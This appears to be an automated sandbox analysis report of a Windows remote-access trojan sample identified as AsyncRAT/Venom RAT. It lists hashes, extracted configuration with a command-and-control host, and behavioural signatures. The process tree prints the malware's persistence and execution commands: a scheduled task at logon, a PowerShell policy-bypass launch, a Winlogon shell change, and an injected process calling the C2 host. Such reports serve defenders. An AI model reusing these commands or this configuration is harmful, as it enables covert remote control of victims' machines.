Analysis
-
max time kernel
1200s -
max time network
1200s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
18-07-2023 10:49
Behavioral task
behavioral1
Sample
JKKHJKHJKHJ.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
JKKHJKHJKHJ.exe
Resource
win10v2004-20230703-en
General
-
Target
JKKHJKHJKHJ.exe
-
Size
63KB
-
MD5
36a2e6b4dea8833ac9642279cc0f2f51
-
SHA1
c646179ba316daabb09406d3705a4f4248b5e0a9
-
SHA256
870a1845baec61018280036e11dc9bdea8de069760fe0a713395c6258a496e61
-
SHA512
27eb6c352ccb66de04a45b1961e872a6c4a1e88faedd8480c81e319bc8c9c63ff48849b8fbba05efc21d64d1b79f761442f5a765b2e40fe5b28c1c860fe16602
-
SSDEEP
768:Ns02C46poI3iPgqUiz9JmoAk25GV6iB1+E0Smv7mqb2ntpwH1obC9johPGKDpqKX:nEIoRp2erBlibbwwAGKDpqKmY7
Malware Config
Extracted
asyncrat
5.0.5
Venom Clients
wasted9sss1-57562.portmap.host:57562
Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
-
delay
1
-
install
true
-
install_file
BBN BNMBN.exe
-
install_folder
%AppData%
Extracted
arrowrat
VenomHVNC
wasted9sss1-57562.portmap.host:57562
uSzDNutNI.exe
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
ClientH.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1014134971-2480516131-292343513-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\LbJIPffl\\LbJIPffl" ClientH.exe -
Async RAT payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/2148-55-0x0000000000840000-0x0000000000856000-memory.dmp asyncrat C:\Users\Admin\AppData\Roaming\BBN BNMBN.exe asyncrat C:\Users\Admin\AppData\Roaming\BBN BNMBN.exe asyncrat behavioral1/memory/2320-72-0x0000000000F90000-0x0000000000FA6000-memory.dmp asyncrat behavioral1/memory/2320-94-0x0000000000B30000-0x0000000000B3E000-memory.dmp asyncrat behavioral1/memory/2320-147-0x0000000000B50000-0x0000000000B60000-memory.dmp asyncrat -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1014134971-2480516131-292343513-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Executes dropped EXE 2 IoCs
Processes:
BBN BNMBN.exeClientH.exepid process 2320 BBN BNMBN.exe 1976 ClientH.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
BBN BNMBN.exedescription ioc process File opened (read-only) \??\D: BBN BNMBN.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ClientH.exedescription pid process target process PID 1976 set thread context of 1416 1976 ClientH.exe cvtres.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 916 timeout.exe -
Modifies registry class 5 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1014134971-2480516131-292343513-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1014134971-2480516131-292343513-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1014134971-2480516131-292343513-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1014134971-2480516131-292343513-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1014134971-2480516131-292343513-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
JKKHJKHJKHJ.exeBBN BNMBN.exepid process 2148 JKKHJKHJKHJ.exe 2148 JKKHJKHJKHJ.exe 2148 JKKHJKHJKHJ.exe 2148 JKKHJKHJKHJ.exe 2148 JKKHJKHJKHJ.exe 2148 JKKHJKHJKHJ.exe 2148 JKKHJKHJKHJ.exe 2148 JKKHJKHJKHJ.exe 2148 JKKHJKHJKHJ.exe 2148 JKKHJKHJKHJ.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe 2320 BBN BNMBN.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
JKKHJKHJKHJ.exeBBN BNMBN.exepowershell.exeClientH.exeexplorer.exeAUDIODG.EXEdescription pid process Token: SeDebugPrivilege 2148 JKKHJKHJKHJ.exe Token: SeDebugPrivilege 2320 BBN BNMBN.exe Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 1976 ClientH.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: 33 1900 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1900 AUDIODG.EXE Token: 33 1900 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1900 AUDIODG.EXE Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe Token: SeShutdownPrivilege 1800 explorer.exe -
Suspicious use of FindShellTrayWindow 31 IoCs
Processes:
explorer.exepid process 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe -
Suspicious use of SendNotifyMessage 21 IoCs
Processes:
explorer.exepid process 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe 1800 explorer.exe -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
JKKHJKHJKHJ.execmd.execmd.exeBBN BNMBN.execmd.exepowershell.exeClientH.exeexplorer.exedescription pid process target process PID 2148 wrote to memory of 1080 2148 JKKHJKHJKHJ.exe cmd.exe PID 2148 wrote to memory of 1080 2148 JKKHJKHJKHJ.exe cmd.exe PID 2148 wrote to memory of 1080 2148 JKKHJKHJKHJ.exe cmd.exe PID 2148 wrote to memory of 2652 2148 JKKHJKHJKHJ.exe cmd.exe PID 2148 wrote to memory of 2652 2148 JKKHJKHJKHJ.exe cmd.exe PID 2148 wrote to memory of 2652 2148 JKKHJKHJKHJ.exe cmd.exe PID 1080 wrote to memory of 1528 1080 cmd.exe schtasks.exe PID 1080 wrote to memory of 1528 1080 cmd.exe schtasks.exe PID 1080 wrote to memory of 1528 1080 cmd.exe schtasks.exe PID 2652 wrote to memory of 916 2652 cmd.exe timeout.exe PID 2652 wrote to memory of 916 2652 cmd.exe timeout.exe PID 2652 wrote to memory of 916 2652 cmd.exe timeout.exe PID 2652 wrote to memory of 2320 2652 cmd.exe BBN BNMBN.exe PID 2652 wrote to memory of 2320 2652 cmd.exe BBN BNMBN.exe PID 2652 wrote to memory of 2320 2652 cmd.exe BBN BNMBN.exe PID 2320 wrote to memory of 1160 2320 BBN BNMBN.exe cmd.exe PID 2320 wrote to memory of 1160 2320 BBN BNMBN.exe cmd.exe PID 2320 wrote to memory of 1160 2320 BBN BNMBN.exe cmd.exe PID 1160 wrote to memory of 2016 1160 cmd.exe powershell.exe PID 1160 wrote to memory of 2016 1160 cmd.exe powershell.exe PID 1160 wrote to memory of 2016 1160 cmd.exe powershell.exe PID 2016 wrote to memory of 1976 2016 powershell.exe ClientH.exe PID 2016 wrote to memory of 1976 2016 powershell.exe ClientH.exe PID 2016 wrote to memory of 1976 2016 powershell.exe ClientH.exe PID 2016 wrote to memory of 1976 2016 powershell.exe ClientH.exe PID 1976 wrote to memory of 1800 1976 ClientH.exe explorer.exe PID 1976 wrote to memory of 1800 1976 ClientH.exe explorer.exe PID 1976 wrote to memory of 1800 1976 ClientH.exe explorer.exe PID 1976 wrote to memory of 1800 1976 ClientH.exe explorer.exe PID 1976 wrote to memory of 1416 1976 ClientH.exe cvtres.exe PID 1976 wrote to memory of 1416 1976 ClientH.exe cvtres.exe PID 1976 wrote to memory of 1416 1976 ClientH.exe cvtres.exe PID 1976 wrote to memory of 1416 1976 ClientH.exe cvtres.exe PID 1976 wrote to memory of 1416 1976 ClientH.exe cvtres.exe PID 1976 wrote to memory of 1416 1976 ClientH.exe cvtres.exe PID 1976 wrote to memory of 1416 1976 ClientH.exe cvtres.exe PID 1976 wrote to memory of 1416 1976 ClientH.exe cvtres.exe PID 1976 wrote to memory of 1416 1976 ClientH.exe cvtres.exe PID 1800 wrote to memory of 824 1800 explorer.exe ctfmon.exe PID 1800 wrote to memory of 824 1800 explorer.exe ctfmon.exe PID 1800 wrote to memory of 824 1800 explorer.exe ctfmon.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JKKHJKHJKHJ.exe"C:\Users\Admin\AppData\Local\Temp\JKKHJKHJKHJ.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "BBN BNMBN" /tr '"C:\Users\Admin\AppData\Roaming\BBN BNMBN.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "BBN BNMBN" /tr '"C:\Users\Admin\AppData\Roaming\BBN BNMBN.exe"'3⤵
- Creates scheduled task(s)
PID:1528 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpF872.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:916 -
C:\Users\Admin\AppData\Roaming\BBN BNMBN.exe"C:\Users\Admin\AppData\Roaming\BBN BNMBN.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"'5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\ClientH.exe"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"6⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"7⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\ctfmon.exectfmon.exe8⤵PID:824
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC wasted9sss1-57562.portmap.host 57562 uSzDNutNI.exe7⤵PID:1416
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4541⤵
- Suspicious use of AdjustPrivilegeToken
PID:1900
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Cab1067.tmpFilesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
C:\Users\Admin\AppData\Local\Temp\ClientH.exeFilesize
90KB
MD55ac5cf4a09a5c6dfd82669a0e24f675d
SHA14f0993bfd2245da594000bb7c2d2bd7d02b60d53
SHA2566136b0b9b28b52962f090cdf34ac650c4b184f3a65e863e2051cdc1219aff051
SHA512e0317cf9a5a495f5e90a88f4a96517626a30c016b7374db41bc79a8bcb0920fcf7691ca3cf48c712b8bc2db075d734ca7cacc771e8f604297600187afe314d3f
-
C:\Users\Admin\AppData\Local\Temp\ClientH.exeFilesize
90KB
MD55ac5cf4a09a5c6dfd82669a0e24f675d
SHA14f0993bfd2245da594000bb7c2d2bd7d02b60d53
SHA2566136b0b9b28b52962f090cdf34ac650c4b184f3a65e863e2051cdc1219aff051
SHA512e0317cf9a5a495f5e90a88f4a96517626a30c016b7374db41bc79a8bcb0920fcf7691ca3cf48c712b8bc2db075d734ca7cacc771e8f604297600187afe314d3f
-
C:\Users\Admin\AppData\Local\Temp\Tar3326.tmpFilesize
164KB
MD54ff65ad929cd9a367680e0e5b1c08166
SHA1c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27
-
C:\Users\Admin\AppData\Local\Temp\tmpF872.tmp.batFilesize
153B
MD5f16e4923376d2a6db951cf5d08196cb0
SHA1a533dad57c6ba36422beafc7e3037e6dc231dd07
SHA2567608e2c6380afc029085b0397c92e6901c1955bec0cc027c20194887a556d314
SHA512e5fa0059ad5fded6e99ea8266bad68da1db3273c7cb06410bf477bd4572ed83073bf89b7e09317c07d1f8d8ff837180089aa07abde3623e59381d2f8ee251646
-
C:\Users\Admin\AppData\Local\Temp\tmpF872.tmp.batFilesize
153B
MD5f16e4923376d2a6db951cf5d08196cb0
SHA1a533dad57c6ba36422beafc7e3037e6dc231dd07
SHA2567608e2c6380afc029085b0397c92e6901c1955bec0cc027c20194887a556d314
SHA512e5fa0059ad5fded6e99ea8266bad68da1db3273c7cb06410bf477bd4572ed83073bf89b7e09317c07d1f8d8ff837180089aa07abde3623e59381d2f8ee251646
-
C:\Users\Admin\AppData\Roaming\BBN BNMBN.exeFilesize
63KB
MD536a2e6b4dea8833ac9642279cc0f2f51
SHA1c646179ba316daabb09406d3705a4f4248b5e0a9
SHA256870a1845baec61018280036e11dc9bdea8de069760fe0a713395c6258a496e61
SHA51227eb6c352ccb66de04a45b1961e872a6c4a1e88faedd8480c81e319bc8c9c63ff48849b8fbba05efc21d64d1b79f761442f5a765b2e40fe5b28c1c860fe16602
-
C:\Users\Admin\AppData\Roaming\BBN BNMBN.exeFilesize
63KB
MD536a2e6b4dea8833ac9642279cc0f2f51
SHA1c646179ba316daabb09406d3705a4f4248b5e0a9
SHA256870a1845baec61018280036e11dc9bdea8de069760fe0a713395c6258a496e61
SHA51227eb6c352ccb66de04a45b1961e872a6c4a1e88faedd8480c81e319bc8c9c63ff48849b8fbba05efc21d64d1b79f761442f5a765b2e40fe5b28c1c860fe16602
-
memory/1416-135-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmpFilesize
4KB
-
memory/1416-167-0x0000000000FF0000-0x0000000001030000-memory.dmpFilesize
256KB
-
memory/1416-145-0x0000000000FF0000-0x0000000001030000-memory.dmpFilesize
256KB
-
memory/1416-144-0x0000000073C20000-0x000000007430E000-memory.dmpFilesize
6.9MB
-
memory/1416-131-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1416-166-0x0000000073C20000-0x000000007430E000-memory.dmpFilesize
6.9MB
-
memory/1416-139-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1416-142-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1416-137-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1416-132-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1416-133-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1416-134-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1800-168-0x0000000003F60000-0x0000000003F61000-memory.dmpFilesize
4KB
-
memory/1800-146-0x0000000003F60000-0x0000000003F61000-memory.dmpFilesize
4KB
-
memory/1800-172-0x0000000003ED0000-0x0000000003EE0000-memory.dmpFilesize
64KB
-
memory/1976-143-0x0000000073C20000-0x000000007430E000-memory.dmpFilesize
6.9MB
-
memory/1976-130-0x0000000073C20000-0x000000007430E000-memory.dmpFilesize
6.9MB
-
memory/1976-129-0x00000000001E0000-0x00000000001FC000-memory.dmpFilesize
112KB
-
memory/2016-124-0x0000000002920000-0x00000000029A0000-memory.dmpFilesize
512KB
-
memory/2016-118-0x000000001B270000-0x000000001B552000-memory.dmpFilesize
2.9MB
-
memory/2016-128-0x000007FEECCB0000-0x000007FEED64D000-memory.dmpFilesize
9.6MB
-
memory/2016-125-0x0000000002920000-0x00000000029A0000-memory.dmpFilesize
512KB
-
memory/2016-123-0x0000000002920000-0x00000000029A0000-memory.dmpFilesize
512KB
-
memory/2016-122-0x000007FEECCB0000-0x000007FEED64D000-memory.dmpFilesize
9.6MB
-
memory/2016-121-0x0000000002920000-0x00000000029A0000-memory.dmpFilesize
512KB
-
memory/2016-120-0x000007FEECCB0000-0x000007FEED64D000-memory.dmpFilesize
9.6MB
-
memory/2016-119-0x0000000002410000-0x0000000002418000-memory.dmpFilesize
32KB
-
memory/2148-68-0x0000000076EF0000-0x0000000077099000-memory.dmpFilesize
1.7MB
-
memory/2148-54-0x000007FEF4C30000-0x000007FEF561C000-memory.dmpFilesize
9.9MB
-
memory/2148-66-0x000007FEF4C30000-0x000007FEF561C000-memory.dmpFilesize
9.9MB
-
memory/2148-57-0x0000000076EF0000-0x0000000077099000-memory.dmpFilesize
1.7MB
-
memory/2148-56-0x000000001B000000-0x000000001B080000-memory.dmpFilesize
512KB
-
memory/2148-55-0x0000000000840000-0x0000000000856000-memory.dmpFilesize
88KB
-
memory/2320-94-0x0000000000B30000-0x0000000000B3E000-memory.dmpFilesize
56KB
-
memory/2320-92-0x0000000076EF0000-0x0000000077099000-memory.dmpFilesize
1.7MB
-
memory/2320-91-0x000007FEF4240000-0x000007FEF4C2C000-memory.dmpFilesize
9.9MB
-
memory/2320-74-0x0000000076EF0000-0x0000000077099000-memory.dmpFilesize
1.7MB
-
memory/2320-73-0x000007FEF4240000-0x000007FEF4C2C000-memory.dmpFilesize
9.9MB
-
memory/2320-72-0x0000000000F90000-0x0000000000FA6000-memory.dmpFilesize
88KB
-
memory/2320-147-0x0000000000B50000-0x0000000000B60000-memory.dmpFilesize
64KB